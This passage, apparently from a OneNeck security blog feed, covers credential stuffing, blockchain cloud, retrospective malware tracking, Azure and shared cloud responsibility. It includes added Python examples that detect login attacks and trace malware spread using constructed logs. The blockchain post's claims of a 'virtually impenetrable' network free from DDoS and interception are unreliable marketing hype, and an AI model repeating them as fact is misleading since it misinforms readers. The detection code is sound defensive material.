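F5's or OneNeck's code). Three signals the text names: attempts per second
from one source, many distinct usernames from one source, and clients that
do not look like browsers. The log format and every line are constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed format: "<epoch> <ip> <user> <result> <user-agent>"
LINE_RE = re.compile(r"^(\d+) (\S+) (\S+) (OK|FAIL) (.+)$")

BROWSER_MARKERS = ("Mozilla/", "Chrome/", "Safari/", "Firefox/", "Edg/")

WINDOW_SECONDS = 10             # sliding window for rate measurement
MAX_ATTEMPTS_PER_WINDOW = 20    # i.e. more than 2 attempts/second sustained
MAX_DISTINCT_USERS = 5          # one genuine client rarely tries many accounts


@dataclass
class Attempt:
    ts: int
    ip: str
    user: str
    ok: bool
    agent: str


def parse(lines: List[str]) -> List[Attempt]:
    out = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:   # unparseable lines are skipped, not fatal
            ts, ip, user, result, agent = m.groups()
            out.append(Attempt(int(ts), ip, user, result == "OK", agent))
    return out


def looks_like_browser(agent: str) -> bool:
    return any(marker in agent for marker in BROWSER_MARKERS)


def flag_sources(attempts: List[Attempt]) -> Dict[str, Set[str]]:
    """Return {ip: {reasons}} for sources that trip any heuristic."""
    by_ip: Dict[str, List[Attempt]] = defaultdict(list)
    for a in attempts:
        by_ip[a.ip].append(a)

    flagged: Dict[str, Set[str]] = defaultdict(set)
    for ip, rows in by_ip.items():
        rows.sort(key=lambda a: a.ts)
        # Sliding window over timestamps: do more than MAX_ATTEMPTS_PER_WINDOW
        # attempts land inside any WINDOW_SECONDS span?
        start = 0
        for end in range(len(rows)):
            while rows[end].ts - rows[start].ts > WINDOW_SECONDS:
                start += 1
            if end - start + 1 > MAX_ATTEMPTS_PER_WINDOW:
                flagged[ip].add("rate")
                break
        users = {a.user for a in rows}
        if len(users) > MAX_DISTINCT_USERS:
            flagged[ip].add("many_usernames")
        if any(not looks_like_browser(a.agent) for a in rows):
            flagged[ip].add("non_browser_agent")
    return dict(flagged)


def build_sample_log() -> List[str]:
    """Constructed log: one human user, one stuffing source, one scripted job."""
    lines = []
    # A person mistypes once, then logs in, from a browser.
    lines.append("1700000000 203.0.113.10 alice FAIL Mozilla/5.0 Chrome/120.0")
    lines.append("1700000004 203.0.113.10 alice OK Mozilla/5.0 Chrome/120.0")
    # A stuffing source: 30 different leaked usernames in 10 seconds, scripted client.
    for i in range(30):
        lines.append(f"{1700000100 + i // 3} 198.51.100.7 user{i:03d} FAIL python-requests/2.31")
    # A legitimate non-browser integration: one account, slow, curl.
    lines.append("1700000200 192.0.2.55 svc-backup OK curl/8.4.0")
    lines.append("1700000260 192.0.2.55 svc-backup OK curl/8.4.0")
    return lines


if __name__ == "__main__":
    for ip, reasons in flag_sources(parse(build_sample_log())).items():
        print(ip, sorted(reasons))
```

Note that the service account trips only the user-agent heuristic: a non-browser client on its own is a weak signal, which is why a WAF combines it with rate and account-spread before blocking.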

  2. Embrace Multi-Factor Authentication

Multi-Factor Authentication works to thwart credential stuffing by requiring additional information or credentials from the user to gain access to corporate data. MFA doesn’t stop all types of attacks, and it doesn’t guarantee security, but it does add additional layers of authentication that make cyberattacks more difficult.

  3. Educate Your Employees

Empower your users with some password management best practices. According to F5, the most significant takeaway for your employees is that no one should ever use network login credentials on any third-party site, because if that site is compromised, then cybercriminals will have access to your corporate network and any applications within.

Don’t Go At It Alone

OneNeck offers extensive cybersecurity expertise. We identify the gaps and provide remediation guidance and a roadmap to face the future with confidence. In today’s accelerated world, you need a partner that helps keep you safe — so you can stop wondering if everything’s alright.

Blockchain: A Revolution in the Cloud
https://www.oneneck.com/blog/security/blockchain-revolution-cloud-computing-security/
Tue, 26 Feb 2019 23:00:00 +0000

Antiquated is not a word commonly associated with the advanced worldwide network of client-server configurations that make up modern data transmission. However, advances in data storage, file sharing and security protocols have struggled to keep pace with demands on infrastructure, cybersecurity threats and the ever-evolving competition that drives the industry.

Fortunately, decentralized computing – a shared ledger system that eliminates server-side shortcomings entirely – stands ready to completely overhaul the way modern businesses access and transact across their networks.

The Case for Cloud Computing on the Blockchain

Blockchain technology introduces a new paradigm in the world of security and data management. With the introduction of a decentralized network come the benefits of a virtually impenetrable infrastructure, free from the threat of DDoS attacks, data interception and localized disruptions. Blockchain systems greatly reduce the cost and vulnerabilities of previous systems. When combined with cloud computing, this new era is heading toward a truly secure and global marketplace for all businesses.

In addition to creating a more secure environment, blockchain-based cloud computing means companies can trust their valuable data in offsite scenarios without the need for costly intermediaries. The self-managed network is free from the constraints of expensive, single-point-of-failure systems. As a distributed ledger, information maintained across a blockchain network is copied and verified at every node, so that each office and user will know they are receiving the most accurate and current information. The kind of assurance provided by this self-reliant technology increases opportunities for multiple project leads to co-exist in the same space so that they can communicate and innovate with mutual cooperation.

Increased File Security

File security is another hazard of modern technology that is greatly improved via blockchain and cloud computing. Until now, no one has managed to develop a system in which sensitive data can be stored in a secure offsite environment, while also remaining freely accessible to those with proper credentials without exposing companies to external risks. Blockchain solves that problem by distributing data evenly across every node in the network.

Using advanced cryptography, all users within a blockchain network are granted immediate access to every iteration of data since the beginning of that ledger’s creation, while would-be hackers are presented with the most secure integrity algorithm ever available to corporations.

However, beyond this, the basic structure of a blockchain system also has multiple additional benefits, including greater internal oversight. While blockchain’s security features were originally designed to prevent snooping from the governments of the world, they have since been adapted to the needs of modern business systems and are now virtually impenetrable from the outside. The sophisticated ledger process prevents tampering from the inside as well.

Since blockchain is based on a trustless system, users get the most accurate information as confirmed by other nodes on the network. This comparison ensures that no one can alter information for personal gain without controlling at least 51 percent of the active nodes, which in multinational scenarios would be incredibly difficult to accomplish. Data theft and corruption become a much less appealing option when faced with the digital footprints that are now impossible to erase without raising even more red flags.

Server hosting technology has grown by leaps and bounds over its short history, but newer technologies are pushing innovations that test the limits of hardware capabilities. With this research comes larger expenses and newer hardware that can become unfeasible for businesses working on a budget.

While cloud computing eases these issues by moving data off site and freeing up resources, it also introduces some security issues and can still present specific hurdles to integration when competing systems don’t communicate as desired. Blockchain cloud computing potentially eliminates the bulk of these issues while introducing an unprecedented level of interchangeability and accountability amongst nodes.

Distributed Apps

Perhaps one of the most interesting developments of blockchain adoption is the ability to construct and utilize distributed applications across the network that can streamline and unify business systems accessing the ledger. These apps integrate with the cloud to bring new levels of cooperation between the business processes already in place and the decentralized network connecting them.

From healthcare systems in which file management involves millions of individual records across countless data systems, to financial corporations operating in dozens of currencies on unique exchange protocols, to a manufacturer's supply chain where tracking needs to be precise down to the second, distributed apps bring a new level of accountability to data management.

Blockchain and the Future of Business

It’s quite clear that blockchain represents much more than cryptocurrency, but the story of how innovative organizations will make use of it is still being written.

One area in which blockchain is already playing a significant role is the so-called Fourth Industrial Revolution or Industry 4.0. Combining blockchain technology with the industrial internet of things (IIoT) will improve traceability and efficiency for the repair and maintenance of connected systems and equipment in smart factories. According to a 2018 Gartner report, nearly one-third of large manufacturers will have implemented Industry 4.0 projects involving blockchain by 2023.

Does your organization have a plan for the changes coming with the next industrial revolution? View our interactive Industry 4.0 experience to find out about the opportunities, challenges, and IT solutions you should be considering as you develop a strategy to adapt and move forward.

While it is uncertain how much of our daily interactions will ultimately be controlled via the blockchain revolution, what is clear is that the underlying technology holds massive potential for modern interactions. When combined with the convenience of cloud computing, blockchain is an asset that further secures and enhances the promises of the decentralized world. It stands to reason that continuing this evolution will unveil even greater innovations as the process matures.

OneNeck takes pride in offering IT solutions for companies moving to the cloud. From hosted private cloud and on-premise private cloud to public cloud solutions, we can customize a design and migration plan for businesses in a variety of industries.

Advances in Cybercrime Demand Greater IT Security
https://www.oneneck.com/blog/security/advances-in-cybercrime-demand-greater-it-security/
Tue, 29 Jan 2019 22:48:00 +0000

A look at retrospective security versus point-in-time solutions

With cybercrime predicted to reach $6 trillion annually by 2021 and to be more profitable—and therefore, more attractive to criminal organizations—than the global combined trade of all major illegal drugs, businesses can no longer rely on traditional network security tools and expect to achieve protection.


More than 75% of all current antivirus engines can’t detect advanced malware

The hackers of yesterday knew only as much as they needed. Brute force was often their tactic of choice, requiring only minimal coding skills, an Internet connection and a criminal mindset. The industry responded by developing antivirus (AV) and intrusion prevention system (IPS) solutions that were adept at detecting and responding to these primitive though damaging cyberattacks. Over time, however, hackers grew more sophisticated and began to employ new techniques to create advanced malware.

These attackers learned to exploit the blind spots of traditional AV and IPS solutions, tricking them into judging malicious attachments safe. And once a file was inside the network, traditional tools did not continue to monitor it to confirm that it was truly benign. That is when the balance of power shifted between hackers and the rest of the world.

Point-in-Time vs. Retrospective Security

Traditional security tools that employ point-in-time security examine files attached to email and messages only once, at the point of entry. The tool applies a fixed set of signatures and rules; if the attachment passes those checks and appears to be safe, the message and its attachment are allowed into the network and are not looked at again. This method stops the majority of commonplace threats, but it fails against advanced malware techniques, including polymorphic malware and environmentally aware (sandbox-evading) malware that behaves benignly while it is being inspected, which can dupe a point-in-time tool into assuming the file is safe.

Advanced malware protection solutions use retrospective security. These solutions examine files and attachments not only at the point of entry but continue to monitor them for as long as they remain within the network, recording each file's hash, origin and activity. That continuous record gives IT visibility into the entire attack continuum: when a file's verdict later changes from clean to malicious, the record shows where the file went and what it did before, during and after the attack, so IT can analyze the event and formulate a course of action.

Retrospective security protects against modern cyber threats

As hackers change their tactics, using encryption, sleep techniques, and polymorphic and environmentally aware malware, IT needs security tools that offer visibility into their systems at any past point in time. The retrospective security toolbox also includes attack chain correlation, behavioral indicators of compromise (IOCs), file trajectory and breach hunting in addition to retrospection. This lets IT see exactly how their network has changed, providing the context that point-in-time systems cannot deliver, and shows the malware's trajectory as it spread through the network.

The increased visibility from retrospective security enables IT to:

  1. Methodically analyze what events transpired during a breach
  2. Learn how their system was entered and what data hackers had accessed
  3. Prevent similar future attacks
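The retrospective model described above (file trajectory, a verdict that changes after entry, and the before/during/after record) as an added Python example. It is not OneNeck or Cisco AMP code; the event log format, host names and abbreviated hashes are constructed for the illustration. The point-in-time view returns only the verdict recorded at entry; the retrospective view replays the log once a hash is reclassified and returns every affected host, every file the malicious file dropped, where it executed, and how long it dwelt before reclassification.

```python
"""Retrospective file trajectory: re-evaluating a point-in-time verdict.

Added example for this post, not vendor code. Assumes a flat event log with
one record per file observation (constructed below): a macro document (H1)
passes the mail gateway as clean, runs on a workstation, drops a second file
(H2), and both spread to other hosts before threat intel reclassifies H1.
"""
from datetime import datetime
from typing import Dict, List, Optional, Set

TS_FMT = "%Y-%m-%dT%H:%M:%S"

# Constructed sample events; hash values abbreviated for readability.
EVENTS = [
    {"ts": "2019-01-28T09:00:00", "host": "mail-gw", "sha256": "H1", "action": "scanned", "verdict": "clean"},
    {"ts": "2019-01-28T09:05:00", "host": "ws-17", "sha256": "H1", "action": "created"},
    {"ts": "2019-01-28T09:06:00", "host": "ws-17", "sha256": "H1", "action": "executed"},
    {"ts": "2019-01-28T09:07:00", "host": "ws-17", "sha256": "H2", "action": "created", "parent": "H1"},
    {"ts": "2019-01-28T09:30:00", "host": "fs-01", "sha256": "H1", "action": "created"},
    {"ts": "2019-01-28T09:45:00", "host": "ws-22", "sha256": "H3", "action": "created"},
    {"ts": "2019-01-28T10:05:00", "host": "ws-22", "sha256": "H2", "action": "created"},
    {"ts": "2019-01-28T10:10:00", "host": "ws-22", "sha256": "H2", "action": "executed"},
]


def point_in_time_verdict(events: List[Dict], sha256: str) -> str:
    """All a point-in-time tool knows: the verdict recorded when the file entered."""
    for e in events:
        if e["sha256"] == sha256 and e["action"] == "scanned":
            return e["verdict"]
    return "unknown"


def expand_indicators(events: List[Dict], seed: str) -> Set[str]:
    """Seed hash plus every file dropped by a file already in the set, transitively."""
    suspect = {seed}
    grew = True
    while grew:
        grew = False
        for e in events:
            if e.get("parent") in suspect and e["sha256"] not in suspect:
                suspect.add(e["sha256"])
                grew = True
    return suspect


def retrospective_trajectory(events: List[Dict], bad_hash: str, reclassified_at: str) -> Dict:
    """Replay the log as if `bad_hash` had been malicious all along."""
    suspect = expand_indicators(events, bad_hash)
    hosts: Dict[str, List[Dict]] = {}      # host -> sightings, in order of first sighting
    executed_on: Set[str] = set()
    first_seen: Optional[str] = None
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["sha256"] not in suspect:
            continue
        hosts.setdefault(e["host"], []).append(e)
        if e["action"] == "executed":
            executed_on.add(e["host"])
        if first_seen is None:
            first_seen = e["ts"]
    dwell_minutes = None
    if first_seen is not None:
        delta = datetime.strptime(reclassified_at, TS_FMT) - datetime.strptime(first_seen, TS_FMT)
        dwell_minutes = int(delta.total_seconds() // 60)
    return {
        "indicators": sorted(suspect),
        "hosts": hosts,
        "executed_on": sorted(executed_on),   # where containment and forensics start
        "dwell_minutes": dwell_minutes,
    }


if __name__ == "__main__":
    print("verdict at entry:", point_in_time_verdict(EVENTS, "H1"))
    report = retrospective_trajectory(EVENTS, "H1", "2019-01-28T10:30:00")
    print("indicators:", report["indicators"])
    print("trajectory:", list(report["hosts"]))
    print("executed on:", report["executed_on"])
    print("dwell before reclassification (min):", report["dwell_minutes"])
```

Note that ws-22 never saw H1 at all; it is implicated only because the dropped file H2 was linked back to its parent. A tool that records only the hash of the original attachment misses that hop, which is why the trajectory record has to capture parent/child relationships, not just file arrivals.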

Retrospective security can also reduce remediation spending

In the event of a breach, an organization using only a point-in-time security solution typically must engage a security consulting firm to perform forensics. Had the company instead used retrospective security tools, its IT managers would already have the information necessary to investigate the breach and devise a strategy to address the security issue.

Defend against malware by increasing visibility into your network

While no network security tool can prevent 100 percent of malware from entering the network, an advanced malware protection solution using retrospective security tools can enable your organization to better secure itself against current and future advanced cyberattacks.

To learn more about how we’re working with Cisco to provide our customers enterprise-grade AMP retrospective security solutions, download the infographic: Real Threats Call for Advanced Malware Protection (AMP).

Windows Server 2008 & 2008 R2 End of Support
https://www.oneneck.com/blog/security/it-security-planning-for-windows-server-2008-2008-r2-end-of-support/
Tue, 22 Jan 2019 22:00:00 +0000

Extended support for both Windows Server 2008 and Windows Server 2008 R2 ends on January 14, 2020.

What does end of support mean for Windows Server 2008 & 2008 R2?

No Security Updates

Without security updates you may fail to comply with standards and regulations that can seriously hamper your ability to:

  • Protect against hackers, malware that gains administrative (root) access to machines, man-in-the-middle attacks, and government subpoenas
  • Securely purge customer data, which otherwise remains exposed to access by outside parties

Compliance Concerns

At the end of support for Windows Server 2008 and 2008 R2, your system may cease to be compliant with regulatory standards, such as:

  • PCI-DSS for credit card transactions
  • HIPAA for medical patient privacy
  • GLBA for financial institutions
  • GDPR for companies who do business in the EU

Maintenance Costs

Staying put will cost more in the end. Maintenance costs for aging hardware will also increase, and customers will face added costs for intrusion detection systems, more advanced firewalls, network segmentation, and other security measures—all simply to isolate Windows Server 2008 and 2008 R2 servers.

Prepare For the Future Today

Don’t let the end of support for Windows Server and SQL Server 2008 sneak up on you—the impacts to security and costs are too important. Avoid business disruptions and use this as an opportunity to adopt the most current security and innovation technologies.

OneNeck can help you prepare for Windows Server 2008 and 2008 R2 end of support and take advantage of your current Microsoft investments and skills by running your workloads in Microsoft Azure. Contact us today.

Can Virtual CISO Services Help Your Business?
https://www.oneneck.com/blog/security/how-vciso-can-help-with-it-security/
Tue, 15 Jan 2019 20:15:00 +0000

Organizations, big or small, are all grappling with combating the onslaught of security attacks, making security a top priority for today’s IT teams in every vertical. As Forbes so broadly states, “Cybersecurity is applicable to every business operation, whether it’s in the military, corporations or entrepreneurs.” And while cybersecurity decisions used to be contained to the boardroom or high-level government agencies, now the average employee is hyper aware of the potential risks a breach can bring.

Yet, despite the rising awareness, many organizations are still woefully unprepared to detect or mitigate an attack before it wreaks havoc on their business. While the entire workforce plays a critical role in a successful security strategy, ultimately responsibility falls on IT security leadership to ensure the confidentiality, integrity and availability of the company’s data.

This is a daunting scenario for security leaders who are overwhelmed by their list of to-dos. They can’t do it all and are struggling to narrow down the never-ending list of potential security projects. So, where should they start? “Focus on projects that reduce the most amount of risk and have the largest business impact,” said Gartner vice president and analyst Neil MacDonald.

But what if you don’t even know where you have the greatest risk and what the potential business impact could be? The answer could lie in having the right security expertise and leadership on your team. However according to salary.com, as of December 2018, the average Chief Information Security Officer (CISO) in the US is making $220,114, a salary that may not be feasible in most mid-market organizations. This is where teaming up with a virtual CISO (vCISO) may be a practical option.

How do you know if you could reap the benefits of a vCISO? Here’s a basic checklist that can help:

  • No Security Strategy – Are you lacking a defined security strategy? Or maybe you don’t even have a clear view of what risks you have and could use an outside perspective? If you are in need of a security architecture to use as a foundation to your security program and future roadmap, an up-front assessment is a great place to start.
  • Too Many Tools – Is your organization protected by numerous, disparate (and often non-integrated) security tools? To cover cloud workloads, thousands of endpoints and the many entry points at the perimeter, tool after tool is deployed in hopes of fortifying against attack, all too often leading to tool sprawl and unidentified gaps.
  • Too Busy to Properly Execute – Do you have a defined security strategy, but can’t execute as well as you should due to constrained resources? According to recent estimates, there will be as many as 3.5 million unfilled cybersecurity positions by 2021, so you’re not alone.
  • Great at Execution, but Lacking Documentation – Is your IT security team top notch at keeping your data safe, but less focused on the documentation? Information security management system documentation often gets back-burnered when pressing security fires arise, leading to audit-trail black holes when it’s time to meet compliance mandates or inventory information assets.
  • Struggling to Meet Compliance Mandates – Are you struggling to meet your industry’s compliance mandates – ISO, CIS, NIST, PCI, etc.? With GDPR in May of 2018, compliance jumped to the security project forefront for many organizations, adding on to an already mounting list of requirements.

These are just some of the common challenges we’re seeing our customers struggle to address, which has led OneNeck to offer Virtual CISO services. While no two engagements are identical, the general purpose of the OneNeck vCISO service is to work with you to run a security control framework assessment, produce a gap analysis, and then provide a remediation plan that addresses the gaps in your environment. We can also help with the remediation, so that depending on the agreed level of engagement, we’re there to help throughout.

Security can be overwhelming, and we want you to know you’re not alone. Interested in hearing how OneNeck’s vCISO service helped a customer improve their existing information security program and boost their overall security posture? Check out this customer story from Gila River Casinos.

Budget for Digital Transformation & IT Security in 2019
https://www.oneneck.com/blog/digital-transformation/it-security-budgets-2019/
Thu, 10 Jan 2019 22:00:00 +0000

Many IT leaders expect their budgets to increase or remain unchanged. This is driven largely by the need to upgrade aging infrastructure, accelerate digital transformation via a shift to the cloud, and enhance their overall IT security posture.

According to Spiceworks’ annual State of IT report on IT budgets and tech trends:

  • Most companies (89%) expect their IT budgets to grow or stay steady in 2019.
  • The need to upgrade outdated IT infrastructure is the biggest driver of IT budget increases in 2019.
  • More than one-third of midsize companies (500 to 999 employees) saw IT budget increases due to corporate tax cuts.
  • Small businesses are making significant increases to their hardware budgets while large enterprises are increasing their cloud budgets in 2019.

Transform and Secure

“Most organizations are increasing IT budgets in 2019 to upgrade aging IT infrastructure and support digital transformation initiatives,” says Peter Tsai, senior technology analyst at Spiceworks. “However, large enterprises, typically with more data and devices to lock down, are primarily increasing budgets due to growing security concerns.”

Digital transformation was one of the biggest trends in 2018, and it looks like that will continue in 2019.  Businesses will continue to allocate IT budget towards technology that enables them to deliver on customer needs and improve security and impact.

With so many different technologies hitting the market, it is incredibly difficult for any organization to know that one is a better fit for its environment than another. Making the right choice of technology is only part of the challenge; integrating it into current applications and workloads without creating new complexities and risk is just as critical.

In addition, according to Spiceworks’ research, 88 percent of large enterprises are increasing IT budgets to tackle security concerns.

Why? Security is no longer “nice to have.” It’s an imperative. As critical systems and business processes become modernized, it also opens the door to risk. The same power that enables these technologies to radically transform business processes also brings the potential to cause gaps in security and loss of information if not properly secured.

As with most major IT initiatives, digital transformation and security are an evolving journey. A seasoned partner can be an invaluable asset in guiding you on your path. Is your organization thinking about undertaking a digital transformation or security initiative? We can help; tell us about your challenge.

Securing Your Azure Deployment
https://www.oneneck.com/blog/security/securing-your-azure-deployment/
Thu, 03 Jan 2019 18:00:00 +0000

As organizations embrace the cloud’s flexibility and agility, Microsoft’s cloud platform, Azure, has become a top choice as a cost-effective solution that scales for any organization, no matter the size, to meet agility and flexibility needs.

In today’s sophisticated threat environment, security is a major consideration for anyone adopting the cloud. Organizations hold the ultimate responsibility for securing their own data and workloads in the cloud and need to adopt security solutions, enact best practices and set policies that will keep their data safe. Microsoft also understands the part it plays in security and provides powerful built-in features such as encryption and access management tools. Before deploying to Azure, organizations need to audit their security strategies to ensure they extend to the cloud environment.

Azure’s Security Features

Even before its 2015 announcement of a $1 billion annual investment in security, Microsoft’s design of the Azure platform was guided by a “security first” approach. Azure’s defense-in-depth strategy assumes that breaches will occur and uses multiple, overlapping controls to limit the damage. In addition, Azure is backed by Microsoft’s global incident response team to mitigate the effects of any attack.

Azure provides encryption for data in transit and at rest. Customers moving large data stores can also ship drives to an Azure data center through the Azure Import/Export service, with the disks encrypted using BitLocker.

For secure access to cloud applications, Azure Active Directory provides enterprises with a comprehensive cloud-based identity and access management solution and integrates readily with on-premises authentication infrastructure. IT managers can use Azure Active Directory to simplify user and group management, integrated with security controls such as conditional access policies.

Incorporating Azure into Your Security Environment

Security in the cloud is a shared responsibility, and while Azure has strong security features, organizations need to understand how their data will be properly secured, whether in the cloud or on-premise — which requires advanced planning before an Azure deployment.

Key Steps to a Secure Azure Deployment

  • Azure Account setup and management: Using Azure Active Directory for user accounts provides a centralized account management infrastructure that enhances security. Role-based access control (RBAC) limits access based on a user’s job responsibilities, and more granular access controls are available to create custom roles that further limit access privileges.

    Added steps to secure privileged accounts, such as multifactor authentication (a token or biometric in addition to the password) and restricting access based on network location, mean that an attacker who steals a password still cannot use it alone to take over the account.

  • Network security: In a cloud environment you don’t have direct physical access to the network, but you can implement controls using virtualized technologies. With Azure Virtual Network, IT administrators can place virtual machines into separate tiers (subnets) based on the sensitivity of the information being processed, stored and transmitted, with network security groups controlling which traffic may pass between tiers.

    This essentially means you can build your own, virtual data center in the cloud and create secure and encrypted links, via virtual private networks, between the cloud and on-premise data centers.

  • Other security tools: It’s important to extend your security practices to the cloud by implementing intrusion prevention technology, system configuration procedures, patch management policies, malware protection and so on. For the tightest protection, implement new tools that are designed to work specifically with Azure.

As a Microsoft Gold Certified and Microsoft Cloud Solution Provider partner, OneNeck can help you architect, deploy and manage your Azure cloud solution. Our team will support your environments 24/7, from initial design to ongoing management of your Azure infrastructure, allowing your organization to focus the right people and resources on your strategic business initiatives — all while increasing efficiency and overall productivity.

Download our eGuide Move Your Business Forward with Azure.

Who Owns Cloud Security? | Cloud Security Solutions
https://www.oneneck.com/blog/security/who-owns-cloud-security/
Tue, 11 Dec 2018 23:00:00 +0000

Organizations are rapidly embracing cloud services to gain agility and thrive in today’s digital economy. This has created a strategic imperative to better manage cybersecurity risk while keeping pace at scale as firms move critical apps to the cloud.

Cloud security is a shared responsibility, where the cloud provider and the tenant each have a role to play. Although it sounds relatively simple, customers are often not clear where their provider’s role ends and their obligations start, creating gaps.

Download our Who Owns Cloud Security eBook, for valuable insights on what measures you and your provider should take to protect your cloud deployments.

Everyone’s Role in Cloud Security
https://www.oneneck.com/blog/cloud/everyone-has-a-role-in-cloud-security/
Wed, 07 Nov 2018 21:00:00 +0000

Outsourcing is becoming an increasingly popular business strategy. By carving off business processes and giving them to outside vendors companies save money and resources. Outsourcing enterprise computing processes using cloud services, for example, allows you to hand off the cost and responsibility of maintaining on-premise hardware and software. However, just because you outsource your enterprise infrastructure does that mean your cloud service provider assumes total responsibility for your network? What about issues such as cloud security, which is a major concern for every IT manager and CIO? Can you hold your cloud service provider accountable for providing watertight data security?

As the use of cloud continues to grow, concern for data security grows with it. When data is an important business asset, management is hesitant to surrender control. In practice, however, cloud-based services are often more secure than on-premises systems. Most cloud service providers maintain rigorous security protocols for disaster recovery and protection from cyber attack. Since providing secure and stable computing services is their primary business, cloud service companies use sophisticated tools to continuously monitor systems, identify vulnerabilities, and close holes in cloud security. They also have service-level agreements (SLAs) to assure customers that security problems are remediated quickly.

So when you engage a cloud services provider you no longer have to worry about data security, right? Wrong!

Enterprise computing is more than hosted hardware and services. Your cloud service provider is responsible for securing the foundation of your infrastructure: the physical facilities, host hardware, hypervisor, storage and core networking, and, for managed services, the database or platform layer. As the customer, you remain responsible for securing your applications, data and related services.

Your cloud provider is generally responsible for cloud security at the network layer, including network segmentation, perimeter services, DDoS mitigation and anti-spoofing controls, and so forth. As the cloud customer, you are responsible for threat detection, security monitoring and incident reporting within your environment. In other words, your provider secures the hosted switches and networks, while you secure the applications and the data traffic they generate. Most SLAs are structured to make it clear that the customer owns everything from the guest operating system upward: access management, patch management, security monitoring, log analysis, and all application security elements.

Finger Pointing Doesn’t Stop Attacks

Assuming that your cloud service provider will include comprehensive cybersecurity as part of their contract is a mistake. There are areas where they have control over the infrastructure and therefore can take responsibility for data security, but there are other areas that have to be the enterprise customer’s responsibility. Developing a collaborative cloud security strategy is the best approach to address risk management and deal with security threats.

Let’s consider some of the most prevalent security threats and where they tend to compromise enterprise networks. According to the 2018 Verizon Data Breach Investigations Report, security issues affect both enterprise network owners and cloud service providers:

  • 73 percent of attacks were perpetrated by outsiders but 28 percent were by insiders, usually employees. Maintaining internal security is largely the responsibility of the cloud customer, since attacks tend to be mounted against corporate targets and not cloud providers.
  • 17 percent of data breaches involved phishing, which includes employees being tricked into surrendering sensitive information such as passwords – again, the responsibility of the network owners, not the cloud service provider.
  • Malware, especially ransomware, is one of the most insidious types of cyberattack. Ransomware attacks have grown 56 percent in one year, and many of these attacks are targeting file servers and databases, locking them until a ransom is paid. These types of attacks tend to target end users, but MIT experts predict that more ransomware is targeting the cloud.
  • Inadequate identity and credential management is a universal threat. Stealing the right credentials is like having the keys to the kingdom for both corporate computers and hosted resources.
  • Account hijacking has become commonplace and affects cloud services and in-house systems alike. With the right account credentials, cybercriminals can eavesdrop on activities and transactions, return falsified data, and redirect users to bogus web sites.
  • Infiltrating cloud services directly is also becoming more common. Bad actors are increasingly leveraging cloud resources to target end users or other cloud providers.

No matter what the nature of the threat, everyone has a role in protecting data assets. A data breach can originate from anywhere, and once the infrastructure is compromised the damage can spread to infect applications, hosts, and network systems. That’s why it’s vital that corporate customers and cloud service providers understand their areas of responsibility when it comes to cyber security.

Develop Collaborative Cloud Security Strategies

To appreciate the respective responsibilities for cloud security, it’s best to start by understanding the cloud service model. Cyber-attacks will happen, so you need to know where your cloud service provider has responsibility and where you need to take charge of enterprise security.

For example, applications are completely your responsibility, so it is vital to secure your code. Whether you support a DevOps environment or simply maintain a basic website, you need security in place across the entire development lifecycle. Code that has not been thoroughly tested before deployment may contain vulnerabilities. Use code review, security testing libraries, and static analysis and dependency scanners to find bugs before release.

Patch management is important for both enterprise customers and cloud service providers. It is the best way to address known vulnerabilities in software and production systems. Cloud service providers maintain patches for their own systems, but you also need your own patch management process. Automated patching and vulnerability scanning help, but you need an established procedure to update system software regularly.

Access management is another essential part of systems security. In addition to managing passwords and data access, you need to define roles and responsibilities to control who can reach sensitive data and systems. Defining roles and limiting access reduces the damage if someone’s credentials are stolen. Integrating your Active Directory (AD) or LDAP authentication with your cloud infrastructure keeps a single authoritative identity source and helps contain data access. Also use two-factor authentication wherever possible.

Ongoing monitoring and log management are important for regulatory compliance as well as for security. Reviewing logs provides an overview of data access and traffic patterns that can highlight suspicious activity, such as a burst of failed logins followed by a success, or a user connecting from an address never seen before. Logs are also essential for forensic investigations, so retain them long enough to reconstruct an incident that is discovered weeks after it began.
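Two of the log reviews the paragraph above calls for, as an added Python example (not OneNeck code): OpenSSH-style authentication lines constructed for the illustration are parsed, then checked for a burst of failed logins followed by a success from the same source, and for successful logins from an address not in a per-user baseline of known-good sources. The log format, thresholds and baseline are assumptions made for the example.

```python
"""Reviewing authentication logs for suspicious access patterns.

Added example for this post, not OneNeck code. Parses constructed,
OpenSSH-style auth log lines and flags two things a reviewer looks for:
credential guessing that eventually succeeded, and a successful login
from a source address never seen for that user before.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Set

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\dZ) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)

# Constructed sample log (RFC 5737 documentation addresses).
LOG_LINES = [
    "2018-11-05T02:10:01Z app-01 sshd[4101]: Failed password for bob from 198.51.100.7 port 51022 ssh2",
    "2018-11-05T02:10:09Z app-01 sshd[4101]: Failed password for bob from 198.51.100.7 port 51023 ssh2",
    "2018-11-05T02:10:17Z app-01 sshd[4101]: Failed password for bob from 198.51.100.7 port 51024 ssh2",
    "2018-11-05T02:10:26Z app-01 sshd[4101]: Failed password for bob from 198.51.100.7 port 51025 ssh2",
    "2018-11-05T02:10:34Z app-01 sshd[4101]: Failed password for bob from 198.51.100.7 port 51026 ssh2",
    "2018-11-05T02:10:41Z app-01 sshd[4101]: Failed password for bob from 198.51.100.7 port 51027 ssh2",
    "2018-11-05T02:10:50Z app-01 sshd[4101]: Accepted password for bob from 198.51.100.7 port 51028 ssh2",
    "2018-11-05T02:11:00Z app-01 sshd[4102]: pam_unix(sshd:session): session opened for user bob",
    "2018-11-05T08:02:11Z app-01 sshd[4190]: Failed password for alice from 10.0.0.5 port 40112 ssh2",
    "2018-11-05T08:02:20Z app-01 sshd[4190]: Accepted password for alice from 10.0.0.5 port 40113 ssh2",
    "2018-11-05T09:15:44Z app-01 sshd[4233]: Accepted password for carol from 203.0.113.44 port 60001 ssh2",
    "2018-11-05T09:20:00Z app-01 sshd[4240]: Failed password for invalid user admin from 203.0.113.9 port 3344 ssh2",
]

# Known-good source addresses per user, as would be learned from prior weeks of logs (assumed).
BASELINE: Dict[str, Set[str]] = {"alice": {"10.0.0.5"}, "bob": {"10.0.0.8"}, "carol": {"10.0.0.9"}}


def parse_auth_log(lines: List[str]) -> List[Dict]:
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:  # session, disconnect and other lines are not login outcomes
            continue
        events.append({
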